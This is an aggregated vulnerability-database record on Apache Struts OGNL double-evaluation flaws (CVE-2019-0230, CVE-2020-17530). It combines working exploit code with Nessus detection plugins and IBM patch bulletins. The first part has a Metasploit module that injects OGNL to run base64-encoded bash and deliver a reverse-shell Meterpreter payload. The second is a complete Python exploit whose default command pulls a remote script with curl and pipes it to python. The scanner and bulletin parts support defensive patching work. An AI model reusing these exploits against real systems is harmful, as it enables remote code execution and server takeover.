\n['CVE', '2020-17530'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'], \n['URL', 'https://github.com/ka1n4t/CVE-2020-17530'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']]) \n]) \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \nOptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request']) \n]) \nend \n \ndef check \nnum1 = rand(1000..9999) \nnum2 = rand(1000..9999) \n \nres = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\")) \nif res.nil? \nreturn CheckCode::Unknown \nelsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty? \nreturn CheckCode::Safe \nend \n \nreturn CheckCode::Appears \nend \n \ndef exploit \ncve = datastore['CVE'] \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\") \n \nif cve == 'CVE-2019-0230' \nognl = [] \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']' \nognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)' \nognl << '#ognlUtil.setExcludedClasses(\\'\\')' \nognl << '#ognlUtil.setExcludedPackageNames(\\'\\')' \nres = send_request_cgi(build_http_request(cve, ognl)) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200 \nend \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded, { cve: cve }) \nwhen :linux_dropper \nexecute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 }) \nend \nend \n \ndef execute_command(cmd, opts = {}) \nsend_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5) \nend \n \ndef build_http_request(cve, ognl) \nognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array \n \nhttp_request_parameters = { 'uri' => normalize_uri(target_uri.path) } \nhttp_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank? \nif cve == 'CVE-2019-0230' \nhttp_request_parameters['method'] = 'GET' \nhttp_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nelsif cve == 'CVE-2020-17530' \nhttp_request_parameters['method'] = 'POST' \nhttp_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nend \nhttp_request_parameters \nend \n \ndef build_ognl(cve, cmd) \ncmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nognl = [] \nif cve == 'CVE-2019-0230' \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)' \nognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\" \nelsif cve == 'CVE-2020-17530' \nognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]' \nognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]' \nognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")' \nognl << '#bean.setBean(#stack)' \nognl << '#context=#bean.get(\"context\")' \nognl << '#bean.setBean(#context)' \nognl << '#macc=#bean.get(\"memberAccess\")' \nognl << '#bean.setBean(#macc)' \nognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")' \nognl << '#bean.put(\"excludedClasses\",#emptyset)' \nognl << '#bean.put(\"excludedPackageNames\",#emptyset)' \nognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")' \nognl << \"#execute.exec({\\\"#{cmd}\\\"})\" \nend \n \nognl \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160721/struts2_multi_eval_ognl.rb.txt"}, {"lastseen": "2020-11-18T03:43:19", "description": "", "cvss3": {}, "published": "2020-11-17T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.5.20 Double OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "PACKETSTORM:160108", "href": "https://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html", "sourceData": "`# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation \n# Date: 08/18/2020 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://struts.apache.org/download.cgi \n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) \n# CVE : CVE-2019-0230 \n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. \n# Source(s): \n# https://github.com/PrinceFPF/CVE-2019-0230 \n# https://cwiki.apache.org/confluence/display/WW/S2-059 \n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 \n \n# !/usr/bin/python \nfrom sys import argv, exit, stdout, stderr \nimport argparse \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport logging \n \n \nclass Exploit: \ndef __init__( \nself, \ntarget='', \nredirect=False, \nproxy_address='' \n): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nself.target = target \nself.session = requests.session() \nself.redirect = redirect \nself.timeout = 0.5 \nself.proxies = { \n'http': 'http://%s' % proxy_address, \n'https': 'http://%s' % proxy_address \n} \\ \nif proxy_address is not None \\ \nand proxy_address != '' else {} \nself.query_params = {} \nself.form_values = {} \nself.cookies = {} \nboundary = \"---------------------------735323031399963166993862150\" \nself.headers = { \n'Content-Type': 'multipart/form-data; boundary=%s' % boundary, \n'Accept': '*/*', \n'Connection': 'close' \n} \npayload = \"%{(#nike='multipart/form-data').\" \\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\ \n\"(#_memberAccess?(#_memberAccess=#dm):\" \\ \n \n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \n\\ \n \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \n\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\" \\ \n\"(#ognlUtil.getExcludedClasses().clear()).\" \\ \n\"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\ \n \n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \n\\ \n \n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\ \n\"(#p=new \njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\ \n \n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" \n\\ \n \n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \n\\ \n\"(#ros.flush())}\" \n \nself.payload = \"--%s\\r\\nContent-Disposition: form-data; \nname=\\\"foo\\\"; \" \\ \n\"filename=\\\"%s\\0b\\\"\\r\\nContent-Type: \ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % ( \nboundary, payload, boundary \n) \n \ndef do_get(self, url, params=None, data=None): \nreturn self.session.get( \nurl=url, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \ndata=data, \nparams=params \n) \n \ndef do_post(self, url, data=None, params=None): \nreturn self.session.post( \nurl=url, \ndata=data, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \nparams=params \n) \n \ndef debug(self): \ntry: \nimport http.client as http_client \nexcept ImportError: \nimport httplib as http_client \nhttp_client.HTTPConnection.debuglevel = 1 \nlogging.basicConfig() \nlogging.getLogger().setLevel(logging.DEBUG) \nrequests_log = logging.getLogger(\"requests.packages.urllib3\") \nrequests_log.setLevel(logging.DEBUG) \nrequests_log.propagate = True \nreturn self \n \ndef send_payload(self, command='curl --insecure -sv \nhttps://10.10.10.10/shell.py|python -'): \nurl = self.target \nstdout.write('sending payload to %s payload %s' % (url, command)) \nresp = self.do_post(url=url, params=self.query_params, \ndata=self.payload.replace('{COMMAND}', command)) \nreturn resp \n \n \nif __name__ == '__main__': \nparser = argparse.ArgumentParser(add_help=True, \ndescription='CVE-2020-0230 Struts \n2 exploit') \ntry: \nparser.add_argument('-target', action='store', help='Target \naddress: http(s)://target.com/index.action') \nparser.add_argument('-command', action='store', \nhelp='Command to execute: touch /tmp/pwn') \nparser.add_argument('-debug', action='store', default=False, \nhelp='Enable debugging: False') \nparser.add_argument('-proxy', action='store', default='', \nhelp='Enable proxy: 10.10.10.10:8080') \n \nif len(argv) == 1: \nparser.print_help() \nexit(1) \noptions = parser.parse_args() \n \nexp = Exploit( \nproxy_address=options.proxy, \ntarget=options.target \n) \n \nif options.debug: \nexp.debug() \nstdout.write('target %s debug %s proxy %s\\n' % ( \noptions.target, options.debug, options.proxy \n)) \n \nresult = exp.send_payload(command=options.command) \nstdout.write('Response: %d\\n' % result.status_code) \n \nexcept Exception as error: \n \nstderr.write('error in main %s' % str(error)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160108/apachestruts2520-eval.txt"}], "nessus": [{"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T00:00:23", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the K35226442 advisory.\n\n - An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload. (CVE-2019-0233)\n\n - Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. (CVE-2019-0230)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-11-03T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache Struts vulnerabilities (K35226442)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL35226442.NASL", "href": "https://www.tenable.com/plugins/nessus/184328", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K35226442.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(184328);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"F5 Networks BIG-IP : Apache Struts vulnerabilities (K35226442)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the K35226442 advisory.\n\n - An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when\n performing a file upload. (CVE-2019-0233)\n\n - Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag\n attributes, may lead to remote code execution. (CVE-2019-0230)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://my.f5.com/manage/s/article/K35226442\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K35226442.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/11/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K35226442';\nvar vmatrix = {\n 'AM': {\n 'affected': [\n '15.1.0','14.1.0-14.1.2','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running the affected module AM');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix 